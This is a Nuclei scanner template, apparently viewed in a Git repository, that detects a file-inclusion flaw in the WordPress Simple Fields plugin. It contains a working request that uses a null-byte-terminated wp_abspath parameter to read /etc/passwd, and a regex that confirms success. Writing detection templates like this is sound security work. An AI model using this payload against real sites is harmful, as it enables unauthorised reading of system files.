nuclei-templates/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml

20 lines
533 B
YAML
Raw Normal View History

2021-05-27 03:15:53 +00:00
id: wp-simple-fields-lfi
info:
name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
author: 0x240x23elu
severity: high
reference:
- https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html
2021-05-27 03:15:53 +00:00
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00"
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-05-27 03:15:53 +00:00
part: body